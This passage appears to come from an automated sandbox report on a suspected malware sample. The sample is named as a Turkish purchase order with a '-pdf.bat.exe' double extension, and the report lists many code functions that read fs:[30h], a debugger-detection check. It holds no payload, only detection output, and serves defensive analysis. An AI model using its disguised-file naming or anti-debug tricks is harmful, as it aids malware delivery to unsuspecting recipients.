            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DE0274 mov eax, dword ptr fs:[00000030h]4_2_32DE0274
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DE0274 mov eax, dword ptr fs:[00000030h]4_2_32DE0274
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DE0274 mov eax, dword ptr fs:[00000030h]4_2_32DE0274
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DE0274 mov eax, dword ptr fs:[00000030h]4_2_32DE0274
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D34260 mov eax, dword ptr fs:[00000030h]4_2_32D34260
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D34260 mov eax, dword ptr fs:[00000030h]4_2_32D34260
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D34260 mov eax, dword ptr fs:[00000030h]4_2_32D34260
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DFD26B mov eax, dword ptr fs:[00000030h]4_2_32DFD26B
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DFD26B mov eax, dword ptr fs:[00000030h]4_2_32DFD26B
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2826B mov eax, dword ptr fs:[00000030h]4_2_32D2826B
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32E05227 mov eax, dword ptr fs:[00000030h]4_2_32E05227
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D67208 mov eax, dword ptr fs:[00000030h]4_2_32D67208
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D67208 mov eax, dword ptr fs:[00000030h]4_2_32D67208
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2823B mov eax, dword ptr fs:[00000030h]4_2_32D2823B
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DEB3D0 mov ecx, dword ptr fs:[00000030h]4_2_32DEB3D0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DEC3CD mov eax, dword ptr fs:[00000030h]4_2_32DEC3CD
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D3A3C0 mov eax, dword ptr fs:[00000030h]4_2_32D3A3C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D3A3C0 mov eax, dword ptr fs:[00000030h]4_2_32D3A3C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D3A3C0 mov eax, dword ptr fs:[00000030h]4_2_32D3A3C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D3A3C0 mov eax, dword ptr fs:[00000030h]4_2_32D3A3C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D3A3C0 mov eax, dword ptr fs:[00000030h]4_2_32D3A3C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D3A3C0 mov eax, dword ptr fs:[00000030h]4_2_32D3A3C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D383C0 mov eax, dword ptr fs:[00000030h]4_2_32D383C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D383C0 mov eax, dword ptr fs:[00000030h]4_2_32D383C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D383C0 mov eax, dword ptr fs:[00000030h]4_2_32D383C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D383C0 mov eax, dword ptr fs:[00000030h]4_2_32D383C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32E053FC mov eax, dword ptr fs:[00000030h]4_2_32E053FC
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D4E3F0 mov eax, dword ptr fs:[00000030h]4_2_32D4E3F0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D4E3F0 mov eax, dword ptr fs:[00000030h]4_2_32D4E3F0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D4E3F0 mov eax, dword ptr fs:[00000030h]4_2_32D4E3F0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D663FF mov eax, dword ptr fs:[00000030h]4_2_32D663FF
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DEF3E6 mov eax, dword ptr fs:[00000030h]4_2_32DEF3E6
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D403E9 mov eax, dword ptr fs:[00000030h]4_2_32D403E9
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D403E9 mov eax, dword ptr fs:[00000030h]4_2_32D403E9
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D403E9 mov eax, dword ptr fs:[00000030h]4_2_32D403E9
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D403E9 mov eax, dword ptr fs:[00000030h]4_2_32D403E9
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D403E9 mov eax, dword ptr fs:[00000030h]4_2_32D403E9
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D403E9 mov eax, dword ptr fs:[00000030h]4_2_32D403E9
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D403E9 mov eax, dword ptr fs:[00000030h]4_2_32D403E9
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D403E9 mov eax, dword ptr fs:[00000030h]4_2_32D403E9
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D8739A mov eax, dword ptr fs:[00000030h]4_2_32D8739A
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D8739A mov eax, dword ptr fs:[00000030h]4_2_32D8739A
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D28397 mov eax, dword ptr fs:[00000030h]4_2_32D28397
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D28397 mov eax, dword ptr fs:[00000030h]4_2_32D28397
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D28397 mov eax, dword ptr fs:[00000030h]4_2_32D28397
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2E388 mov eax, dword ptr fs:[00000030h]4_2_32D2E388
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2E388 mov eax, dword ptr fs:[00000030h]4_2_32D2E388
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2E388 mov eax, dword ptr fs:[00000030h]4_2_32D2E388
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D5438F mov eax, dword ptr fs:[00000030h]4_2_32D5438F
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D5438F mov eax, dword ptr fs:[00000030h]4_2_32D5438F
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D533A5 mov eax, dword ptr fs:[00000030h]4_2_32D533A5
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D633A0 mov eax, dword ptr fs:[00000030h]4_2_32D633A0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D633A0 mov eax, dword ptr fs:[00000030h]4_2_32D633A0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32E0539D mov eax, dword ptr fs:[00000030h]4_2_32E0539D
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D29353 mov eax, dword ptr fs:[00000030h]4_2_32D29353
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D29353 mov eax, dword ptr fs:[00000030h]4_2_32D29353
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB035C mov eax, dword ptr fs:[00000030h]4_2_32DB035C
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB035C mov eax, dword ptr fs:[00000030h]4_2_32DB035C
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB035C mov eax, dword ptr fs:[00000030h]4_2_32DB035C
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB035C mov ecx, dword ptr fs:[00000030h]4_2_32DB035C
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB035C mov eax, dword ptr fs:[00000030h]4_2_32DB035C
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB035C mov eax, dword ptr fs:[00000030h]4_2_32DB035C
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DFA352 mov eax, dword ptr fs:[00000030h]4_2_32DFA352
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB2349 mov eax, dword ptr fs:[00000030h]4_2_32DB2349
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB2349 mov eax, dword ptr fs:[00000030h]4_2_32DB2349
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB2349 mov eax, dword ptr fs:[00000030h]4_2_32DB2349
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB2349 mov eax, dword ptr fs:[00000030h]4_2_32DB2349
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB2349 mov eax, dword ptr fs:[00000030h]4_2_32DB2349
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB2349 mov eax, dword ptr fs:[00000030h]4_2_32DB2349
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB2349 mov eax, dword ptr fs:[00000030h]4_2_32DB2349
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB2349 mov eax, dword ptr fs:[00000030h]4_2_32DB2349
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB2349 mov eax, dword ptr fs:[00000030h]4_2_32DB2349
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB2349 mov eax, dword ptr fs:[00000030h]4_2_32DB2349
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB2349 mov eax, dword ptr fs:[00000030h]4_2_32DB2349
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB2349 mov eax, dword ptr fs:[00000030h]4_2_32DB2349
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB2349 mov eax, dword ptr fs:[00000030h]4_2_32DB2349
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB2349 mov eax, dword ptr fs:[00000030h]4_2_32DB2349
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB2349 mov eax, dword ptr fs:[00000030h]4_2_32DB2349
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2D34C mov eax, dword ptr fs:[00000030h]4_2_32D2D34C
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2D34C mov eax, dword ptr fs:[00000030h]4_2_32D2D34C
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32E05341 mov eax, dword ptr fs:[00000030h]4_2_32E05341
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DD437C mov eax, dword ptr fs:[00000030h]4_2_32DD437C
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D37370 mov eax, dword ptr fs:[00000030h]4_2_32D37370
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D37370 mov eax, dword ptr fs:[00000030h]4_2_32D37370
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D37370 mov eax, dword ptr fs:[00000030h]4_2_32D37370
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DEF367 mov eax, dword ptr fs:[00000030h]4_2_32DEF367
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2C310 mov ecx, dword ptr fs:[00000030h]4_2_32D2C310
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D50310 mov ecx, dword ptr fs:[00000030h]4_2_32D50310
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB930B mov eax, dword ptr fs:[00000030h]4_2_32DB930B
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB930B mov eax, dword ptr fs:[00000030h]4_2_32DB930B
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB930B mov eax, dword ptr fs:[00000030h]4_2_32DB930B
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D6A30B mov eax, dword ptr fs:[00000030h]4_2_32D6A30B
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D6A30B mov eax, dword ptr fs:[00000030h]4_2_32D6A30B
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D6A30B mov eax, dword ptr fs:[00000030h]4_2_32D6A30B
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D27330 mov eax, dword ptr fs:[00000030h]4_2_32D27330
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DF132D mov eax, dword ptr fs:[00000030h]4_2_32DF132D
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DF132D mov eax, dword ptr fs:[00000030h]4_2_32DF132D
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D5F32A mov eax, dword ptr fs:[00000030h]4_2_32D5F32A
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB20DE mov eax, dword ptr fs:[00000030h]4_2_32DB20DE
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D590DB mov eax, dword ptr fs:[00000030h]4_2_32D590DB
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D470C0 mov eax, dword ptr fs:[00000030h]4_2_32D470C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D470C0 mov ecx, dword ptr fs:[00000030h]4_2_32D470C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D470C0 mov ecx, dword ptr fs:[00000030h]4_2_32D470C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D470C0 mov eax, dword ptr fs:[00000030h]4_2_32D470C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D470C0 mov ecx, dword ptr fs:[00000030h]4_2_32D470C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D470C0 mov ecx, dword ptr fs:[00000030h]4_2_32D470C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D470C0 mov eax, dword ptr fs:[00000030h]4_2_32D470C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D470C0 mov eax, dword ptr fs:[00000030h]4_2_32D470C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D470C0 mov eax, dword ptr fs:[00000030h]4_2_32D470C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D470C0 mov eax, dword ptr fs:[00000030h]4_2_32D470C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D470C0 mov eax, dword ptr fs:[00000030h]4_2_32D470C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D470C0 mov eax, dword ptr fs:[00000030h]4_2_32D470C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D470C0 mov eax, dword ptr fs:[00000030h]4_2_32D470C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D470C0 mov eax, dword ptr fs:[00000030h]4_2_32D470C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D470C0 mov eax, dword ptr fs:[00000030h]4_2_32D470C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D470C0 mov eax, dword ptr fs:[00000030h]4_2_32D470C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D470C0 mov eax, dword ptr fs:[00000030h]4_2_32D470C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D470C0 mov eax, dword ptr fs:[00000030h]4_2_32D470C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2C0F0 mov eax, dword ptr fs:[00000030h]4_2_32D2C0F0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D720F0 mov ecx, dword ptr fs:[00000030h]4_2_32D720F0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D550E4 mov eax, dword ptr fs:[00000030h]4_2_32D550E4
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D550E4 mov ecx, dword ptr fs:[00000030h]4_2_32D550E4
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2A0E3 mov ecx, dword ptr fs:[00000030h]4_2_32D2A0E3
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32E050D9 mov eax, dword ptr fs:[00000030h]4_2_32E050D9
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D380E9 mov eax, dword ptr fs:[00000030h]4_2_32D380E9
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D35096 mov eax, dword ptr fs:[00000030h]4_2_32D35096
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D5D090 mov eax, dword ptr fs:[00000030h]4_2_32D5D090
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D5D090 mov eax, dword ptr fs:[00000030h]4_2_32D5D090
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D6909C mov eax, dword ptr fs:[00000030h]4_2_32D6909C
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D3208A mov eax, dword ptr fs:[00000030h]4_2_32D3208A
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2D08D mov eax, dword ptr fs:[00000030h]4_2_32D2D08D
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DF60B8 mov eax, dword ptr fs:[00000030h]4_2_32DF60B8
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DF60B8 mov ecx, dword ptr fs:[00000030h]4_2_32DF60B8
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32E05060 mov eax, dword ptr fs:[00000030h]4_2_32E05060
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D32050 mov eax, dword ptr fs:[00000030h]4_2_32D32050
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DD705E mov ebx, dword ptr fs:[00000030h]4_2_32DD705E
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DD705E mov eax, dword ptr fs:[00000030h]4_2_32DD705E
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D5B052 mov eax, dword ptr fs:[00000030h]4_2_32D5B052
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D41070 mov eax, dword ptr fs:[00000030h]4_2_32D41070
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D41070 mov ecx, dword ptr fs:[00000030h]4_2_32D41070
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D41070 mov eax, dword ptr fs:[00000030h]4_2_32D41070
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D41070 mov eax, dword ptr fs:[00000030h]4_2_32D41070
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D41070 mov eax, dword ptr fs:[00000030h]4_2_32D41070
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D41070 mov eax, dword ptr fs:[00000030h]4_2_32D41070
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D41070 mov eax, dword ptr fs:[00000030h]4_2_32D41070
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D41070 mov eax, dword ptr fs:[00000030h]4_2_32D41070
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D41070 mov eax, dword ptr fs:[00000030h]4_2_32D41070
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D41070 mov eax, dword ptr fs:[00000030h]4_2_32D41070
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D41070 mov eax, dword ptr fs:[00000030h]4_2_32D41070
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D41070 mov eax, dword ptr fs:[00000030h]4_2_32D41070
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D41070 mov eax, dword ptr fs:[00000030h]4_2_32D41070
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D5C073 mov eax, dword ptr fs:[00000030h]4_2_32D5C073
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D4E016 mov eax, dword ptr fs:[00000030h]4_2_32D4E016
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D4E016 mov eax, dword ptr fs:[00000030h]4_2_32D4E016
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D4E016 mov eax, dword ptr fs:[00000030h]4_2_32D4E016
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D4E016 mov eax, dword ptr fs:[00000030h]4_2_32D4E016
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DF903E mov eax, dword ptr fs:[00000030h]4_2_32DF903E
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DF903E mov eax, dword ptr fs:[00000030h]4_2_32DF903E
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DF903E mov eax, dword ptr fs:[00000030h]4_2_32DF903E
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DF903E mov eax, dword ptr fs:[00000030h]4_2_32DF903E
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2A020 mov eax, dword ptr fs:[00000030h]4_2_32D2A020
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2C020 mov eax, dword ptr fs:[00000030h]4_2_32D2C020
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32E061E5 mov eax, dword ptr fs:[00000030h]4_2_32E061E5
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D6D1D0 mov eax, dword ptr fs:[00000030h]4_2_32D6D1D0
